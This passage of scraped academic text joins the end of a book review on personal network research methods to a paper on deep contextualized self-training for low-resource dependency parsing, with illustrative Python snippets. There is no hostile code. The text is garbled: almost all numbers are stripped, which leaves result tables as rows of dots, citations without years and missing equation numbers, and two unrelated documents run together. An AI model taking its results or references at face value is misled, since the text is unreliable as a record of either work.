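# later used as respondent-level variables in statistical models
summary = {
    "density": nx.density(g),
    "components": nx.number_connected_components(g),
    "mean_degree": sum(d for _, d in g.degree()) / g.number_of_nodes(),
    "cohesive_subgroups": len(greedy_modularity_communities(g)),
}
print(summary)
```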
both the structural cohesion of the whole and the organization into defined subgroups are two key dimensions. the personal network has proved to be a space that “captures the context” of the respondents (luke, ). on the one hand, it represents the articulation of the social circles in which the individual participates. on the other hand, it indirectly reflects the relationships between the groups that compose this personal environment. finally, personal networks also have the potential to explore inter-individual differences, through the construction of typologies among other methodological options. in this context, visualization strategies are useful both for collecting personal network data and for developing qualitative interviews, often with a biographical component. they also allow the comparison of personal networks (e.g., through a standardized scheme of clustered graphs). the book has a section of color graphic representations that illustrates the structural and compositional properties connections of personal networks with a fixed number of or more alters. this section shows that visualization is not only a strategy for communicating research results but can easily be combined with qualitative strategies to deepen in ego’s point of view on relationships. accuracy, reliability, and statistical models for the rest, some of the classic themes in the study of structural properties are especially well treated, such as the accuracy and reliability of the information obtained, the estimation of the size of personal networks, or the ethics of network research. this is perhaps not surprising, as some of the authors have been especially active in those areas of research. to reduce the respondent burden, empirically validated recommendations are also provided. the book ends with the presentation of the most advanced models of multilevel analysis, which have revolutionized the possibilities of studying personal networks, combining many factors, and allowing the contrast of more complex hypotheses (snijders et al., ; wellman and frank, ). this section explains how to deal with multicollinearity problems when using multiple regression analysis. this is very practical for some areas of the social sciences where it remains one of the most widely used statistical models. among others, the relevance of principal component analysis and cluster analysis is reviewed. finally, the use of exponential random graph models (ergms) and stochastic actor-oriented models (saoms) to examining the formation of alter-alter ties are presented. the book is written in a clear and accessible way. on the one hand, it is suitable for an introductory level, as it presents the concepts from scratch, explains the most common mistakes, and illustrates the contents with examples based on experience. on the other hand, in each chapter, several boxes are included with a selection of particularly relevant research cases in the personal network literature. the latter not only makes reading more entertaining but also offers an enriching picture of some of the most significant findings of recent decades. among other cases, some studies are presented illustrating how to reach hard-to-reach populations, how to generate networks from a personal diary or from the phone contacts, how to estimate whole networks from personal networks, or how to build typologies. conclusion the book conducting personal network research is specially designed for those who approach the study of personal networks for the first time, starting from scratch. 
however, i think it will also be useful for researchers in the area, allowing them to reflect on how a valuable body of knowledge has been constituted on the structural properties of the social contexts where the individual is integrated. the recent publication of three manuals on the analysis of personal networks (crossley et al., ; mccarty et al., ; perry et al., ) involves the consolidation of a collection of methodological innovations that have reinforced the structural ap- proach in the study of personal communities. without a doubt, this systematization effort will inspire future research. the structure of the personal network is a space in which the relations between groups converge and it comprehensively captures the set of interaction contexts in which the individual participates. as this book shows, the last two decades have served to build a series of models, strategies, and research instruments that will multiply the productivity of this area of study in the coming years. when i come across some of the visualizations that we did in our first studies, now i can only look at them with new eyes. now we not only have a better understanding of the structure of personal networks but also the research questions have changed. the construction of typologies, the use of hybrid designs (combining personal networks and complete networks), and the improvement of multilevel analysis models are some of the steps that are already guessed along the way. reviewed by isidro maya jariego, social psy chology department, universidad de sevilla, spain references crossley, n., bellotti, e., edwards, g., everett, m. g., koskinen, j. and tranmer, m. . social network analysis for ego-nets: social network analysis for actor-centred networks. london: sage. hâncean, m. g., molina, j. l. and lubbers, m. j. . recent advancements, developments and applications of personal network analysis. international review of social research ( ): – . luke, d. a. . getting the big picture in community science: methods that capture context. american journal of community psychology ( - ): – . mccarty, c. . structure in personal networks. journal of social structure ( ): . mccarty, c., lubbers, m. j., vacca, r. and molina, j. l. . conducting personal network research: a practical guide. new york: guilford publications, pp. commentary: how to do personal network surveys: from name generators to statistical modeling maya-jariego, i. . why name generators with a fixed number of alters may be a pragmatic option for personal network analysis. american journal of community psychology ( - ): – . maya-jariego, i., holgado, d. and florido, d. . relations between professional groups in the atlantic and mediterranean fishing enclaves of andalusia (spain): a personal networks approach with clustered graphs. marine policy : – . perry, b. l., pescosolido, b. a. and borgatti, s. p. . egocentric network analysis: foundations, methods, and models (vol. ). cambridge: cambridge university press. snijders, t., spreen, m. and zwaagstra, r. . the use of multilevel modeling for analysing personal networks: networks of cocaine users in an urban area. journal of quantitative anthropology ( ): – . wellman, b. and frank, k. . “network capital in a multi-level world: getting support from personal communities”, in lin, n., coook, k. s. and burt, r. (eds), social capital: theory and research transaction, piscataway, nj, – . 
deep contextualized self-training for low resource dependency parsing guy rotman and roi reichart faculty of industrial engineering and management, technion, iit grotman@campus.technion.ac.il roiri@ie.technion.ac.il abstract neural dependency parsing has proven very effective, achieving state-of-the-art results on numerous domains and languages. unfortunately, it requires large amounts of labeled data, which is costly and laborious to create. in this paper we propose a self- training algorithm that alleviates this anno- tation bottleneck by training a parser on its own output. our deep contextualized self-training (dcst) algorithm utilizes representation models trained on sequence labeling tasks that are derived from the parser’s output when applied to unlabeled data, and integrates these models with the base parser through a gating mech- anism. we conduct experiments across multiple languages, both in low resource in-domain and in cross-domain setups, and demonstrate that dcst substantially out- performs traditional self-training as well as recent semi-supervised training methods. introduction deep neural networks (dnns) have improved the state-of-the-art in a variety of nlp tasks. these include dependency parsing (dozat and manning, ), semantic parsing (hershcovich et al., ), named entity recognition (yadav and bethard, ), part of speech (pos) tagging (plank and agić, ), and machine translation (vaswani et al., ), among others. unfortunately, dnns rely on in-domain labeled training data, which is costly and laborious to achieve. this annotation bottleneck limits the applicability of nlp technology to a small number of languages and domains. it is hence not a surprise that substantial recent research efforts have been our code is publicly available at https://github. com/rotmanguy/dcst. devoted to dnn training based on both labeled and unlabeled data, which is typically widely available (§ ). a prominent technique for training machine learning models on labeled and unlabeled data is self-training (yarowsky, ; abney, ). in this technique, after the model is trained on a labeled example set it is applied to another set of unlabeled examples, and the automatically and manually labeled sets are then combined in order to re-train the model—a process that is sometimes performed iteratively. although self-training has shown useful for a variety of nlp tasks, its success for deep learning models has been quite limited (§ ). our goal is to develop a self-training algorithm that can substantially enhance dnn models in cases where labeled training data are scarce. particularly, we are focusing (§ ) on the lightly supervised setup where only a small in-domain labeled dataset is available, and on the domain adaptation setup where the labeled dataset may be large but it comes from a different domain than the one to which the model is meant to be applied. our focus task is dependency parsing, which is essential for many nlp tasks (levy and goldberg, ; angeli et al., ; toutanova et al., ; hadiwinoto and ng, ; marcheggiani et al., ), but where self-training has typically failed (§ ). moreover, neural dependency parsers (kiperwasser and goldberg, ; dozat and manning, ) substantially outperform their linear predecessors, which makes the develop- ment of self-training methods that can enhance these parsers in low-resource setups a crucial challenge. we present a novel self-training method, suit- able for neural dependency parsing. 
our algorithm (§ ) follows recent work that has demonstrated the power of pre-training for improving dnn models in nlp (peters et al., ; devlin et al., ) and particularly for domain adaptation (ziser and reichart, ). however, whereas in previous work a representation model, also known as a contextualized embedding model, is trained on a language modeling related task, our algorithm utilizes a representation model that is trained on sequence prediction tasks derived from the parser's output. our representation model and the base parser are integrated into a new model through a gating mechanism, and the resulting parser is then trained on the manually labeled data. we experiment (§ , ) with a large variety of lightly supervised and domain adaptation dependency parsing setups. for the lightly supervised case we consider setups: in different english domains and in other languages. for the domain adaptation case we consider setups: in different english domains and in other languages. our deep contextualized self-training (dcst) algorithm demonstrates substantial performance gains over a variety of baselines, including traditional self-training and the recent cross-view training approach (cvt) (clark et al., ) that was designed for semi-supervised learning with dnns. previous work self-training in nlp self-training has proven useful for various nlp tasks, including word sense disambiguation (yarowsky, ; mihalcea, ), bilingual lexicon induction (artetxe et al., ), neural machine translation (imamura and sumita, ), semantic parsing (goldwasser et al., ), and sentiment analysis (he and zhou, ). for constituency parsing, self-training has been shown to improve linear parsers both when considerable training data are available (mcclosky et al., a,b), and in the lightly supervised and the cross-domain setups (reichart and rappoport, ). although several authors failed to demonstrate the efficacy of self-training for dependency parsing (e.g., rush et al., ), recently it was found useful for neural dependency parsing in fully supervised multilingual settings (rybak and wróblewska, ). the impact of self-training on dnns is less researched compared with the extensive investigation with linear models. recently, ruder and plank ( ) evaluated the impact of self-training and the closely related tri-training method (zhou and li, ; søgaard, ) on dnns for pos tagging and sentiment analysis. they found self-training to be effective for the sentiment classification task, but it failed to improve their bilstm pos tagging architecture. tri-training has proven effective for both the classification and the sequence tagging task, and in vinyals et al. ( ) it has been shown useful for neural constituency parsing. this is in line with steedman et al. ( ), who demonstrated the effectiveness of the closely related co-training method (blum and mitchell, ) for linear constituency parsers. lastly, clark et al. ( ) presented the cvt algorithm, a variant of self-training that uses unsupervised representation learning.
cvt differs from classical self-training in the way it exploits the unlabeled data: it trains auxiliary models on restricted views of the input to match the predictions of the full model that observes the whole input. we propose a self-training algorithm based on deep contextualized embeddings, where the embedding model is trained on sequence tagging tasks that are derived from the parser's output on unlabeled data. in extensive lightly supervised and cross-domain experiments with a neural dependency parser, we show that our dcst algorithm outperforms traditional self-training and cvt. pre-training and deep contextualized embedding our dcst algorithm is related to recent work on dnn pre-training. in this line, a dnn is first trained on large amounts of unlabeled data and is then used as the word embedding layer of a more complex model that is trained on labeled data to perform an nlp task. typically, only the upper, task-specific, layers of the final model are trained on the labeled data, while the parameters of the pre-trained embedding network are kept fixed. the most common pre-training task is language modeling or a closely related variant (mccann et al., ; peters et al., ; ziser and reichart, ; devlin et al., ). the outputs of the pre-trained dnn are often referred to as contextualized word embeddings, as these dnns typically generate a vector embedding for each input word, which takes its context into account. pre-training has led to performance gains in many nlp tasks. recently, che et al. ( ) incorporated elmo embeddings (peters et al., ) into a neural dependency parser and reported improvements
( ) presented an adversarial model for cross-domain dependency parsing in which the encoders of the source and the target domains are integrated through a gating mechanism. their approach requires target do- main labeled data for parser training and hence it cannot be applied in the unsupervised domain adaptation setup we explore (§ ). we adopt their gating mechanism to our model and extend it to integrate more than two encoders into a final model. figure : the biaffine parser. background: the biaffine parser the parser we utilize in our experiments is the biaffine parser (dozat and manning, ). because the structure of the parser affects our dcst algorithm, we briefly describe it here. a sketch of the parser architecture is provided in figure . the input to the parser is a sentence (x , x , . . . , xm) of length m. an embedding layer embeds the words into fixed-size vectors (w , w , . . . , wm). additionally, character-level embeddings ckt retrieved from a cnn (zhang et al., ), and a pos embedding pt, are concatenated to each word vector. at time t, the final input vector ft = [wt; ct; pt] is then fed into a bilstm encoder eparser that outputs a hidden representation ht: ht = eparser(ft). ( ) given the hidden representations of the i’th word hi and the j’th word hj , the decoder outputs a score si,j, indicating the model belief that the latter should be the head of the former in the dependency tree. more formally, si,j = r t i urj + w t j rj, ( ) where ri = mlp(hi), and u and wj are learned parameters (mlp is a multi-layered perceptron). similarly, a score li,j,k is calculated for the k’th possible dependency label of the arc (i, j): li,j,k = q t i u ′ kqj + w ′t k [qi; qj] + b ′ k, ( ) where qi = mlp ′ (hi), and u ′ k, w ′ k, and b ′ k are learned parameters. during training the model aims to maximize the probability of the gold tree: m∑ i= p(yi|xi, θ) + p(y′i|xi, yi, θ), ( ) downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april algorithm deep contextualized self-training (dcst) input: labeled data l, unlabeled data u algorithm: . train the base parser on l (§ ). . parse the sentences of u with the base parser. . transform the automatically parsed trees of u to one or more word-level tagging schemes (§ . ). . train (a) contextualized embedding model(s) to predict the word-level tagging(s) of u (§ . ). . integrate the representation model(s) of step with the base parser, and train the resulting parser on l (§ . ). where yi is the head of xi, y′i is the label of the arc (xi, yi), θ represents the model’s parameters, p(yi|xi, θ) ∝ exp(sxi,yi), and p(y′i|xi, yi, θ) ∝ exp(lxi,yi,y′i). at test time, the parser runs the mst algorithm (edmonds, ) on the arc scores in order to generate a valid tree. deep contextualized self-training in this section we present our dcst algorithm for dependency parsing (algorithm ). as a semi- supervised learning algorithm, dcst assumes a labeled dataset l = {(xli, yli)} |l| i= , consisting of sentences and their gold dependency trees, and an unlabeled dataset u = {xui } |u| i= , consisting of sentences only. we start (algorithm , step ) by training the base parser (the biaffine parser in our case) on the labeled dataset l. once trained, the base parser can output a dependency tree for each of the unlabeled sentences in u (step ). we then transform the automatic dependency trees generated for u into one or more word-level tagging schemes (step ). in § . we elaborate on this step. 
then, we train a bilstm sequence tagger to predict the word- level tags of u (step ). if the automatic parse trees are transformed to more than one tagging scheme, we train multiple biltms—one for each scheme. finally, we construct a new parser by integrating the base parser with the representation bilstm(s), and train the final parser on the labeled dataset l (step ). at this stage, the base parser parameters are randomly initialized, while the parameters of the representation bilstm(s) are initialized to those learned in step . we next discuss the three word-level tagging schemes derived from the dependency trees (step ), and then the gating mechanism utilized in order to compose the hybrid parser (step ). . representation learning (steps and ) in what follows we present the three word-level tagging schemes we consider at step of the dcst algorithm. transferring the parse trees into tagging schemes is the key for populating information from the original (base) parser on unlabeled data, in a way that can later be re-encoded to the parser through its word embedding layers. the key challenge we face when implementing this idea is the transformation of dependency trees into word level tags that preserve important aspects of the information encoded in the trees. we consider tagging schemes that maintain various aspects of the structural information encoded in the tree. particularly, we start from two tagging schemes that even if fully predicted still leave ambiguity about the actual parse tree: the number of direct dependants each word has and the distance of each word from the root of the tree. we then consider a tagging scheme, referred to as the relative pos-based scheme, from which the dependency tree can be fully reconstructed. while other tagging schemes can definitely be proposed, we believe that the ones we consider here span a range of possibilities that allows us to explore the validity of our dcst framework. more specifically, the tagging schemes we consider are defined as follows: number of children each word is tagged with the number of its children in the dependency tree. we consider only direct children, rather than other descendants, which is equivalent to counting the number of outgoing edges of the word in the tree. distance from the root each word is tagged with its minimal distance from the root of the tree. for example, if the arc (root , j) is included in the tree, the distance of the j’th word from the root is . likewise, if (root , j) is not included but (root, i) and (i, j) are, then j’th distance is . relative pos-based encoding each word is tagged with its head word according to the relative pos-based scheme (spoustová and spousta, ; strzyz et al., ) the head of a word is encoded by a pair (p, e) ∈ p × [−m + , m − ], where p is the set of all possible parts of speech and m is the sentence length. for a positive (negative) number e and a pos p, the pair indicates that the head of the represented word is the e’th word to its right (left) with the pos tag p. to avoid sparsity downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : the sequence tagger applied to automatically parsed sentences in u (algorithm , step ). the tagger predicts for each word its label according to one of the three tagging schemes: number of children (blue), distance from the root (red), and relative pos-based encoding (black). the curved arrows sketch the gold dependency tree from which the word-level tags are derived. 
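as a concrete illustration of the three schemes, the sketch below derives all three tag sequences from a toy dependency tree given as a list of head indices and pos tags. it is a self-contained example under simplifying assumptions (0 marks the root, direct dependents of the root get distance 1, and the pos coarsening step is omitted); it is not the authors' code.

```python
# heads[i] = head of word i+1 (1-based indices, 0 = root); pos[i] = its POS tag
heads = [2, 0, 2, 5, 2]                    # a toy 5-word tree
pos   = ["DET", "NOUN", "VERB", "DET", "NOUN"]
n = len(heads)

# scheme 1: number of direct children of each word
num_children = [sum(1 for h in heads if h == i + 1) for i in range(n)]

# scheme 2: distance of each word from the root (root's dependents get 1)
def depth(i):                              # i is a 1-based word index
    d = 1
    while heads[i - 1] != 0:
        i = heads[i - 1]
        d += 1
    return d

dist_from_root = [depth(i + 1) for i in range(n)]

# scheme 3: relative POS-based encoding of the head as a (pos, offset) pair:
# the head is the offset-th word carrying that POS to the right (offset > 0)
# or to the left (offset < 0) of the current word
def rel_pos_tag(i):                        # i is a 1-based word index
    h = heads[i - 1]
    if h == 0:
        return ("ROOT", 0)
    p = pos[h - 1]
    if h > i:                              # head lies to the right
        matches = [j for j in range(i + 1, h + 1) if pos[j - 1] == p]
        return (p, matches.index(h) + 1)
    matches = [j for j in range(h, i) if pos[j - 1] == p]   # head to the left
    return (p, -(len(matches) - matches.index(h)))

rel_pos = [rel_pos_tag(i + 1) for i in range(n)]
print(num_children)    # [0, 3, 0, 0, 1]
print(dist_from_root)  # [2, 1, 2, 3, 2]
print(rel_pos)         # [('NOUN', 1), ('ROOT', 0), ('NOUN', -1), ('NOUN', 1), ('NOUN', -1)]
```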
we coarsen the pos tags related to nouns, proper names, verbs, adjectives, punctuation marks, and brackets into one tag per category. although this word-level tagging scheme was introduced as a means of formulating dependency parsing as a sequence tagging task, in practice sequence models trained on this scheme are not competitive with state-of-the-art parsers and often generate invalid tree structures (strzyz et al., ). here we investigate the power of this scheme as part of a self-training algorithm.

the sequence tagger. our goal is to encode the information in the automatically parsed trees into a model that can be integrated with the parser at later stages. this is why we choose to transform the parse trees into word-level tagging schemes that can be learned accurately and efficiently by a sequence tagger. note that efficiency plays a key role in the lightly supervised and domain adaptation setups we consider, as large amounts of unlabeled data should compensate for the lack of labeled training data from the target domain. we hence choose a simple sequence tagging architecture, depicted in figure . the encoder $E_{tgr}$ is a bilstm, similar to $E_{parser}$ of the parser. the decoder is composed of two fully connected layers with dropout (srivastava et al., ) and an exponential linear unit activation function (clevert et al., ), followed by a final softmax layer that outputs the tag probabilities.

figure : an illustration of the hybrid parser with three auxiliary sequence taggers. an input word vector is passed through the parser encoder ($E_{parser}$) and the three pre-trained tagger encoders ($E_{tgr}$). the gating mechanism (gate) computes a weighted average of the hidden vectors. finally, the output of the gating mechanism is passed to the biaffine decoder to predict the arc and label scores for each word pair.

the final hybrid parser (step )

in step , the final step of algorithm , we integrate the bilstm of the sequence tagger, which encodes the information in the automatically generated dependency trees, with the base parser. importantly, when doing so we initialize the bilstm weights to those to which it converged at step . the parameters of the base (biaffine) parser, in contrast, are randomly initialized. the resulting hybrid parser is then trained on the labeled data in l. this way, the final model integrates the information from both l and the automatic tagging of u, generated in steps and . we next describe how the encoders of the sequence tagger and the biaffine parser, $E_{tgr}$ and $E_{parser}$, are integrated through a gating mechanism, similar to that of sato et al. ( ).

the gating mechanism. given an input word vector $f_t$ (§ ), the gating mechanism learns to scale between the bilstm encoder of the parser and that of the sequence tagger (figure ):

$a_t = \sigma(W_g [E_{parser}(f_t); E_{tgr}(f_t)] + b_g),$
$g_t = a_t \odot E_{parser}(f_t) + (1 - a_t) \odot E_{tgr}(f_t),$

where $\odot$ is the element-wise product, $\sigma$ is the sigmoid function, and $W_g$ and $b_g$ are the gating mechanism parameters. the combined vector $g_t$ is then fed to the parser's decoder.
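numerically, the gate is just a learned, element-wise convex combination of the two encoder outputs. here is a minimal numpy sketch of the two-encoder gate for a single word; the shapes and the random initialization are placeholders rather than the published implementation, and the extension to several taggers (given next) replaces the sigmoid with a softmax over per-encoder scores.

```python
import numpy as np

rng = np.random.default_rng(0)
d = 8                                   # hidden size of both encoders

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

# encoder outputs for one word (stand-ins for E_parser(f_t) and E_tgr(f_t))
e_parser = rng.normal(size=d)
e_tgr = rng.normal(size=d)

# gate parameters: W_g maps the concatenated encodings to d gate values
W_g = rng.normal(size=(d, 2 * d))
b_g = np.zeros(d)

a = sigmoid(W_g @ np.concatenate([e_parser, e_tgr]) + b_g)   # a_t
g = a * e_parser + (1.0 - a) * e_tgr                         # g_t, fed to the decoder

# with n taggers, one score vector s^(i) is computed per encoder and the
# sigmoid is replaced by a softmax over the n+1 encoders
print(g.shape)
```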
extension to n sequence taggers. we can naturally extend our hybrid parser to support n auxiliary taggers (see again figure ). given n taggers trained on n different tagging schemes, the gating mechanism is modified to be:

$s^{(i)}_t = W^{(i)}_g [E^{(1)}_{parser}(f_t); E^{(2)}_{tgr}(f_t); \ldots; E^{(n+1)}_{tgr}(f_t)] + b^{(i)}_g,$
$a^{(i)}_t = \frac{\exp(s^{(i)}_t)}{\sum_{j=1}^{n+1} \exp(s^{(j)}_t)},$
$g_t = a^{(1)}_t \odot E^{(1)}_{parser}(f_t) + \sum_{i=2}^{n+1} a^{(i)}_t \odot E^{(i)}_{tgr}(f_t).$

this extension provides a richer representation of the automatic tree structures, as every tagging scheme captures a different aspect of the trees. indeed, in most of our experiments, when integrating the base parser with our three proposed schemes, the resulting model was superior to models that consider a single tagging scheme.

evaluation setups

this paper focuses on exploiting unlabeled data in order to improve the accuracy of a supervised parser. we expect this approach to be most useful when the parser does not have sufficient labeled data for training, or when the labeled training data do not come from the same distribution as the test data. we hence focus on two setups:

the lightly supervised in-domain setup. in this setup we are given a small labeled dataset $L = \{(x^l_i, y^l_i)\}_{i=1}^{|L|}$ of sentences and their gold dependency trees and a large unlabeled dataset $U = \{x^u_i\}_{i=1}^{|U|}$ of sentences coming from the same domain, where $|L| \ll |U|$. our goal is to parse sentences from the domain of l and u.

the unsupervised domain adaptation setup. in this setup we are given a labeled source-domain dataset $L = \{(x^l_i, y^l_i)\}_{i=1}^{|L|}$ of sentences and their gold dependency trees, and an unlabeled dataset $U = \{x^u_i\}_{i=1}^{|U|}$ of sentences from a different target domain. unlike the lightly supervised setup, here l may be large enough to train a high-quality parser, as long as the training and test sets come from the same domain. however, our goal here is to parse sentences from the target domain.

experiments

we experiment with the task of dependency parsing in two setups: (a) lightly supervised in-domain and (b) unsupervised domain adaptation.

data. we consider two datasets: (a) the english ontonotes . (hovy et al., ) corpus. this corpus consists of text from domains: broadcast conversation (bc: training, development, and test sentences), broadcast news (bn: , , ), magazine (mz: , , ), news (nw: , , ), bible (pt: , , ), telephone conversation (tc: , , ), and web (wb: , , ). the corpus is annotated with constituency parse trees and pos tags, as well as other labels that we do not use in our experiments. the constituency trees were converted to dependency trees using the elitcloud conversion tool. in the lightly supervised setup we experiment with each domain separately. we further utilize this corpus in our domain adaptation experiments. (b) the ud dataset (mcdonald et al., ; nivre et al., , ). this corpus contains more than corpora of over languages, annotated with dependency trees and universal pos tags. for the lightly supervised setup we chose low-resource languages that have no more than k training sentences: old church slavonic (cu), danish (da), persian (fa), indonesian (id), latvian (lv), slovenian (sl), swedish (sv), turkish (tr), urdu (ur), and vietnamese (vi), and performed monolingual experiments with each. for the domain adaptation setup we experiment with languages, considering two corpora from different domains for each: czech (cs fictree: fiction, cs pdt: news and science), galician (gl ctg: science and legal, gl treegal: news), italian (it isdt: legal, news and wiki, it postwita: social media), romanian (ro nonstandard: poetry and bible, ro rrt: news, literature, science, legal and wiki), and swedish (sv lines: literature and politics, sv talbanken: news and textbooks).
training setups for the lightly supervised setup we performed experiments with the ontonotes we removed wb test set sentences where all words are pos tagged with ‘‘xx’’. https://github.com/elitcloud/elit-java. in case a language has multiple corpora, our training, development and test sets are concatenations of the corresponding sets in these corpora. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/elitcloud/elit-java domains and the ud corpora, for a total of in-domain setups. for each setup we consider three settings that differ from each other in the size of the randomly selected labeled training and development sets: , , or . we use the original test sets for evaluation, and the remaining training and development sentences as unlabeled data. for the english unsupervised domain adaptation setup, we consider the news (nw) section of onto- notes . as the source domain, and the remaining sections as the target domains. the nw training and development sets are used for the training and development of the parser, and the unlabeled versions of the target domain training and develop- ment sets are used for training and development of the representation model. the final model is evaluated on the target domain test set. similarly, for unsupervised domain adaptation with the ud languages, we consider within each language one corpus as the source domain and the other as the target domain, and apply the same train/development/test splits as above. for each language we run two experiments, differing in which of the two corpora is considered the source and which is considered the target. for all domain adaptation experiments, when training the final hybrid parser (figure ) we sometimes found it useful to keep the parameters of the bilstm tagger(s) fixed in order to avoid an overfitting of the final parser to the source domain. we treat the decision of whether or not to keep the parameters of the tagger(s) fixed as a hyper-parameter of the dcst models and tune it on the development data. we measure parsing accuracy with the standard unlabeled and labeled attachment scores (uas and las), and measure statistical significance with the t-test (following dror et al., ). models and baselines we consider four variants of our dcst algorithm, differing on the word tagging scheme on which the bilstm of step is trained (§ . ): dcst-nc: with the number of children scheme, dcst-dr: with the distance from the root scheme, dcst-rpe: with the relative pos-based encoding scheme, and dcst-ens where the parser is integrated with three bilstms, one for each scheme (where ens stands for ensemble) (§ . ). in languages where the development set was smaller than sentences we used the entire development set. to put the results of our dcst algorithm in context, we compare its performance to the following baselines. base: the biaffine parser (§ ), trained on the labeled training data. base-fs: the biaffine parser (§ ), trained on all the labeled data available in the full training set of the corpus. in the domain adaptation setups base-fs is trained on the entire training set of the target domain. this baseline can be thought of as an upper bound on the results of a lightly-supervised learning or domain-adaptation method. base + random gating (rg): a randomly initialized bilstm is integrated to the biaffine parser through the gating mechanism, and the resulting model is trained on the labeled training data. 
we compare to this baseline in order to quantify the effect of the added parameters of the bilstm and the gating mechanism, when this mechanism does not inject any information from unlabeled data. self- training: the traditional self-training procedure. we first train the base parser on the labeled training data, then use the trained parser to parse the unlabeled data, and finally re-train the base parser on both the manual and automatic trees. we would also like to test the value of training a representation model to predict the dependency labeling schemes of § . , in comparison to the now standard pre-training with a language modeling objective. hence, we experiment with a variant of dcst where the bilstm of step is trained as a language model (dcst-lm). finally, we compare to the cross-view training algorithm (cvt) (clark et al., ), which was developed for semi-supervised learning with dnns. hyper-parameters we use the biaffine parser implementation of ma et al. ( ). we consider the following hyper-parameters for the parser and the sequence tagger: epochs with an early stopping criterion according to the development set, the adam optimizer (kingma and ba, ), a batch size of , a learning rate of . , and dropout probabilities of . . the -layer stacked bilstms of the parser and the sequence tagger generate hidden representations of size . the fully connected layers of the tagger are of size (first layer) https://github.com/tensorflow/models/ tree/master/research/cvt text. https://github.com/xuezhemax/neuronlp . downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april https://github.com/tensorflow/models/tree/master/research/cvt_text https://github.com/tensorflow/models/tree/master/research/cvt_text https://github.com/xuezhemax/neuronlp bc bn mz nw pt tc wb model uas las uas las uas las uas las uas las uas las uas las base . . . . . . . . . . . . . . base+rg . . . . . . . . . . . . . . dcst-lm . . . . . . . . . . . . . . self-training . . . . . . . . . . . . . . cvt . . . . . . . . . . . . . . dcst-nc . . . . . . . . . . . . . . dcst-dr . . . . . . . . . . . . . . dcst-rpe . . . . . . . . . . . . . . dcst-ens . . . . . . . . . . . . . . base-fs . . . . . . . . . . . . . . table : lightly supervised ontonotes results with training sentences. base-fs is an upper bound. cu da fa id lv sl sv tr ur vi model uas las uas las uas las uas las uas las uas las uas las uas las uas las uas las base . . . . . . . . . . . . . . . . . . . . base+rg . . . . . . . . . . . . . . . . . . . . dcst-lm . . . . . . . . . . . . . . . . . . . . self-training . . . . . . . . . . . . . . . . . . . . cvt . . . . . . . . . . . . . . . . . . . . dcst-nc . . . . . . . . . . . . . . . . . . . . dcst-dr . . . . . . . . . . . . . . . . . . . . dcst-rpe . . . . . . . . . . . . . . . . . . . . dcst-ens . . . . . . . . . . . . . . . . . . . . base-fs . . . . . . . . . . . . . . . . . . . . table : lightly supervised ud results with training sentences. base-fs is an upper bound. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april and (second layer). all other parser hyper- parameters are identical to those of the original implementation. we utilize -dimensional pre-trained word embeddings: glove (pennington et al., ) for english and fasttext (grave et al., ) for the ud languages. character and pos embeddings are -dimensional and are initialized to random normal vectors. cvt is run for k gradient update steps. 
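for contrast with dcst, the traditional self-training baseline described above fits in a few lines. the parser interface used here (train/parse methods and a factory that builds a fresh parser) is hypothetical and only meant to make the control flow explicit; it is not tied to any specific library.

```python
def traditional_self_training(parser_factory, labeled, unlabeled):
    """One round of classic self-training for a dependency parser.

    parser_factory: callable returning a fresh parser with .train(sents, trees)
                    and .parse(sents) methods (hypothetical interface).
    labeled:   list of (sentence, gold_tree) pairs
    unlabeled: list of sentences
    """
    base = parser_factory()
    base.train([s for s, _ in labeled], [t for _, t in labeled])

    # label the unlabeled data with the base parser
    auto_trees = base.parse(unlabeled)

    # retrain a fresh parser on the union of manual and automatic trees
    sentences = [s for s, _ in labeled] + list(unlabeled)
    trees = [t for _, t in labeled] + list(auto_trees)
    retrained = parser_factory()
    retrained.train(sentences, trees)
    return retrained
```

dcst replaces the last step: instead of feeding the automatic trees back as parsing targets, it converts them to word-level tags, pre-trains tagger encoders on those tags, and re-injects the encoders through the gating mechanism.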
results table presents the lightly supervised ontonotes results when training with labeled sentences, and table presents the ud results in the same setup. tables and report domain adaptation results for the ontonotes and ud target do- mains, respectively. underscored results are sig- nificant compared to the highest scoring baseline, based on t-test with p < . . dcst with syntactic self-training dcst- ens, our model that integrates all three syntactically self-trained bilstms, is clearly the best model. in the lightly supervised setup, it performs best on of ontonotes domains and on of ud corpora (with the uas measure). in the cases where dcst-ens is not the best performing model, it is the second or third best model. in the english and multilingual domain adaptation setups, dcst-ens is clearly the best performing model, where in only multilingual target domains it is second. moreover, dcst-nc, dcst-dr, and dcst- rpe, which consider only one syntactic scheme, also excel in the lightly supervised setup. they outperform all the baselines (models presented above the top separating lines in the tables) in the ud experiments, and dcst-rpe and dcst-dr outperform all the baselines in of ontonotes domains (with the las measure). in the domain adaptation setup, however, they are on par with the strongest baselines, which indicates the importance of exploiting the information in all three schemes in this setup (results are not shown in tables and in order to save space). http://nlp.stanford.edu/data/glove. b. d.zip. https://fasttext.cc/docs/en/crawl- vectors.html. for this comparison, base-fs is not considered a baseline, but an upper bound. note, that with few exceptions, dcst-nc is the least effective method among the syntactically self-trained dcst alternatives. this indicates that encoding the number of children each word has in the dependency tree is not a sufficiently informative view of the tree. comparison to baselines the cvt algorithm performs quite well in the english ontonotes lightly supervised setup—it is the best performing model on two domains (nw and pt) and the best baseline for three other domains when considering the uas measure (bc, bn, and tc). however, its performance substantially degrades in domain adaptation. particularly, in out of ontonotes setups and in out of ud setups it is the worst performing model. moreover, cvt is the worst performing model in the lightly supervised multilingual setup. overall, this recently proposed model that demonstrated strong results across several nlp tasks, does not rival our dcst models with syntactic self-training in our experimental tasks. notice that clark et al. ( ) did not experiment in domain adaptation setups and did not consider languages other than english. our results suggest that in these cases dcst with syntactic self- training is a better alternative. we next evaluate the impact of the different components of our model. first, comparison with dcst-lm—the version of our model where the syntactically self-trained bilstm is replaced with a bilstm trained on the same unlabeled data but with a language modeling objective, allows us to evaluate the importance of the self-generated syntactic signal. the results are conclusive: in all our four setups—english and multilingual lightly supervised, and english and multilingual domain adaptation—dcst-lm is outperformed by dcst-ens that considers all three self-trained bilstms. 
